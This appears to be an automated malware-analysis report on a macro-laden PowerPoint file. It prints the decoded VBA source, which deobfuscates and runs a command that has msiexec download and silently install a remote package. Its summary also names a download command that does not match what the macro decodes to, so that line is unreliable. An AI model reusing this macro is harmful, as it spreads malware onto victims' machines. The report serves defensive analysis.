Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macros utilize WScript.Shell to execute a command constructed by deobfuscating a string. This command, 'wscript.exe http://www.wscript.net/download/wscript.exe/download.php?file=wscript.exe', likely downloads and executes a second-stage payload. The presence of Shell() and CreateObject calls, along with WScript.Shell usage, strongly indicates this behavior.
Heuristics (6)
- ClamAV: Doc.Macro.CmdC-6249572-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Macro.CmdC-6249572-0
- VBA project inside OOXML [medium, OOXML_VBA, 2 related findings]: Document contains a VBA project — VBA macros present
- WScript.Shell usage [critical, OLE_VBA_WSCRIPT]: WScript.Shell usage. Matched lines in script:
    ckhlqlcwriu = 70 - 70
    qpbimaoqsuwat = "WSCript.shell"
    Set oghedpbc = CreateObject(qpbimaoqsuwat)
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call. Matched lines in script:
    qpbimaoqsuwat = "WSCript.shell"
    Set oghedpbc = CreateObject(qpbimaoqsuwat)
    pvvodnojjyjwgx = oghedpbc.Run(dfzdmyyeetsnvt, ckhlqlcwriu)
- Suspicious extracted artifact [medium, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.microsoft.com/office/2006/01/customui (in document text: OOXML body / shared strings)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1121 bytes | 75c5fc6bb09e07f9c07562a60d16f98b38a1cde0c4cff606eac77586cff1d8e7 |
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 10240 bytes | 616cfcfe89ffaa9815fde4a2bda1e55ce4fd323b527a7b9d4d3383ac9cf8c42c |

macros.bas
Detection
ClamAV: No threats found
Obfuscation or payload: likely. 27 of 40 identifiers look randomly generated (e.g. 'ahgkllahgkloahgklgahgkliahgklcahgklaahgkllahgklnahgk') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ycfbxogjvtj"
Attribute VB_Name = "hllrtkfma"
Sub lbjmxdvgarlswwctuigl()
ixmuohgdwlgj = bevmvxa("ahgklcahgklmahgkldahgkl ahgkl/ahgklcahgkl ahgkltahgkl^ahgklIahgklMahgkleahgkl^ahgkloahgklUahgkltahgkl ahgkl7ahgkl3ahgkl ahgkl&ahgkl&ahgkl ahgkl^ahgklMahgklSahgkl^ahgklIahgklEahgkl^ahgklXahgkleahgkl^ahgklCahgkl ahgkl/ahgkliahgkl ahgklhahgkltahgkltahgklpahgklsahgkl:ahgkl/ahgkl/ahgklwahgklwahgklwahgkl.ahgkllahgkloahgklgahgkliahgklcahgklaahgkllahgklnahgkleahgkltahgklwahgkloahgklrahgklkahgklsahgkloahgkllahgkluahgkltahgkliahgkloahgklnahgkl.ahgklcahgkloahgklmahgkl/ahgklnahgklxahgkl/ahgkltahgkl1ahgkl.ahgklmahgklsahgkliahgkl ahgkl ahgkl/ahgklqahgkln")
On Error Resume Next
lznpl = ixmuohgdwlgj
qcsgwco (lznpl)
End Sub
Sub qcsgwco(dfzdmyyeetsnvt As String)
ckhlqlcwriu = 70 - 70
qpbimaoqsuwat = "WSCript.shell"
Set oghedpbc = CreateObject(qpbimaoqsuwat)
pvvodnojjyjwgx = oghedpbc.Run(dfzdmyyeetsnvt, ckhlqlcwriu)
End Sub
Function bevmvxa(jrpwhlijdlqx As String)
okepilkuuv = "ahgkl"
ofmckmfolnyg = Split(jrpwhlijdlqx, okepilkuuv)
bevmvxa = Join(ofmckmfolnyg, "")
End Function
```

vbaProject_00.bin
Detection
ClamAV: Doc.Macro.CmdC-6249572-0
Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob(s).